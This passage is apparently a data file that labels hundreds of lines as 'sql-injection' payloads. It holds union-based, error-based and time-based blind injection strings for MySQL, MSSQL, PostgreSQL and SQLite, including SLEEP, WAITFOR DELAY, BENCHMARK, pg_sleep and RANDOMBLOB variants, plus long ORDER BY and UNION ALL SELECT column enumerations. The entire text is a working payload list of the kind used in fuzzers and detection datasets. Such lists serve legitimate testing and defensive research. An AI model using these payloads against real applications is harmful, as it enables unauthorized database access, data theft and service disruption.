columnnames having 1=1 --' +sql-injection,'-1' UNION SELECT 1,2,3--+' +sql-injection,'' UNION SELECT sum(columnname ) from tablename --' +sql-injection,'-1 UNION SELECT 1 INTO @,@' +sql-injection,'-1 UNION SELECT 1 INTO @,@,@' +sql-injection,'1 AND (SELECT * FROM Users) = 1' +sql-injection,'' AND MID(VERSION(),1,1) = '5';' +sql-injection,'' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --' +sql-injection,'Finding the table name' +sql-injection,'Time-Based:' +sql-injection,',(select * from (select(sleep(10)))a)' +sql-injection,'%2c(select%20*%20from%20(select(sleep(10)))a)' +sql-injection,'';WAITFOR DELAY '0:0:30'--' +sql-injection,'# from wapiti' +sql-injection,'sleep(5)#' +sql-injection,'1 or sleep(5)#' +sql-injection,'" or sleep(5)#' +sql-injection,'' or sleep(5)#' +sql-injection,'" or sleep(5)="' +sql-injection,'' or sleep(5)='' +sql-injection,'1) or sleep(5)#' +sql-injection,'") or sleep(5)="' +sql-injection,'') or sleep(5)='' +sql-injection,'1)) or sleep(5)#' +sql-injection,'")) or sleep(5)="' +sql-injection,'')) or sleep(5)='' +sql-injection,';waitfor delay '0:0:5'--' +sql-injection,');waitfor delay '0:0:5'--' +sql-injection,'';waitfor delay '0:0:5'--' +sql-injection,'";waitfor delay '0:0:5'--' +sql-injection,'');waitfor delay '0:0:5'--' +sql-injection,'");waitfor delay '0:0:5'--' +sql-injection,'));waitfor delay '0:0:5'--' +sql-injection,''));waitfor delay '0:0:5'--' +sql-injection,'"));waitfor delay '0:0:5'--' +sql-injection,'benchmark(10000000,MD5(1))#' +sql-injection,'1 or benchmark(10000000,MD5(1))#' +sql-injection,'" or benchmark(10000000,MD5(1))#' +sql-injection,'' or benchmark(10000000,MD5(1))#' +sql-injection,'1) or benchmark(10000000,MD5(1))#' +sql-injection,'") or benchmark(10000000,MD5(1))#' +sql-injection,'') or benchmark(10000000,MD5(1))#' +sql-injection,'1)) or benchmark(10000000,MD5(1))#' +sql-injection,'")) or benchmark(10000000,MD5(1))#' +sql-injection,'')) or benchmark(10000000,MD5(1))#' +sql-injection,'pg_sleep(5)--' +sql-injection,'1 or pg_sleep(5)--' +sql-injection,'" or pg_sleep(5)--' +sql-injection,'' or pg_sleep(5)--' +sql-injection,'1) or pg_sleep(5)--' +sql-injection,'") or pg_sleep(5)--' +sql-injection,'') or pg_sleep(5)--' +sql-injection,'1)) or pg_sleep(5)--' +sql-injection,'")) or pg_sleep(5)--' +sql-injection,'')) or pg_sleep(5)--' +sql-injection,'AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe' +sql-injection,'AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='' +sql-injection,'AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)' +sql-injection,'AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--' +sql-injection,'AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#' +sql-injection,'SLEEP(5)#' +sql-injection,'SLEEP(5)--' +sql-injection,'SLEEP(5)="' +sql-injection,'SLEEP(5)='' +sql-injection,'or SLEEP(5)' +sql-injection,'or SLEEP(5)#' +sql-injection,'or SLEEP(5)--' +sql-injection,'or SLEEP(5)="' +sql-injection,'or SLEEP(5)='' +sql-injection,'waitfor delay '00:00:05'' +sql-injection,'waitfor delay '00:00:05'--' +sql-injection,'waitfor delay '00:00:05'#' +sql-injection,'benchmark(50000000,MD5(1))' +sql-injection,'benchmark(50000000,MD5(1))--' +sql-injection,'benchmark(50000000,MD5(1))#' +sql-injection,'or benchmark(50000000,MD5(1))' +sql-injection,'or benchmark(50000000,MD5(1))--' +sql-injection,'or benchmark(50000000,MD5(1))#' +sql-injection,'pg_SLEEP(5)' +sql-injection,'pg_SLEEP(5)--' +sql-injection,'pg_SLEEP(5)#' +sql-injection,'or pg_SLEEP(5)' +sql-injection,'or pg_SLEEP(5)--' +sql-injection,'or pg_SLEEP(5)#' +sql-injection,''\"' +sql-injection,'AnD SLEEP(5)' +sql-injection,'AnD SLEEP(5)--' +sql-injection,'AnD SLEEP(5)#' +sql-injection,'&&SLEEP(5)' +sql-injection,'&&SLEEP(5)--' +sql-injection,'&&SLEEP(5)#' +sql-injection,'' AnD SLEEP(5) ANd '1' +sql-injection,''&&SLEEP(5)&&'1' +sql-injection,'ORDER BY SLEEP(5)' +sql-injection,'ORDER BY SLEEP(5)--' +sql-injection,'ORDER BY SLEEP(5)#' +sql-injection,'(SELECT * FROM (SELECT(SLEEP(5)))ecMj)' +sql-injection,'(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#' +sql-injection,'(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--' +sql-injection,'+benchmark(3200,SHA1(1))+'' +sql-injection,'+ SLEEP(10) + '' +sql-injection,'RANDOMBLOB(500000000/2)' +sql-injection,'AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))' +sql-injection,'OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))' +sql-injection,'RANDOMBLOB(1000000000/2)' +sql-injection,'AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))' +sql-injection,'OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))' +sql-injection,'SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/' +sql-injection,'ORDER BY SLEEP(5)' +sql-injection,'ORDER BY 1,SLEEP(5)' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30' +sql-injection,'ORDER BY SLEEP(5)#' +sql-injection,'ORDER BY 1,SLEEP(5)#' +sql-injection,'ORDER BY 1,SLEEP(5),3#' +sql-injection,'ORDER BY 1,SLEEP(5),3,4#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#' +sql-injection,'ORDER BY SLEEP(5)--' +sql-injection,'ORDER BY 1,SLEEP(5)--' +sql-injection,'ORDER BY 1,SLEEP(5),3--' +sql-injection,'ORDER BY 1,SLEEP(5),3,4--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--' +sql-injection,'ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--' +sql-injection,'UNION ALL SELECT 1' +sql-injection,'UNION ALL SELECT 1,2' +sql-injection,'UNION ALL SELECT 1,2,3' +sql-injection,'UNION ALL SELECT 1,2,3,4' +sql-injection,'UNION ALL SELECT 1,2,3,4,5' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30' +sql-injection,'UNION ALL SELECT 1#' +sql-injection,'UNION ALL SELECT 1,2#' +sql-injection,'UNION ALL SELECT 1,2,3#' +sql-injection,'UNION ALL SELECT 1,2,3,4#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#' +sql-injection,'UNION ALL SELECT 1--' +sql-injection,'UNION ALL SELECT 1,2--' +sql-injection,'UNION ALL SELECT 1,2,3--' +sql-injection,'UNION ALL SELECT 1,2,3,4--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--' +sql-injection,'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),3' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),4' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22' +sql-injection,'UNION SELECT 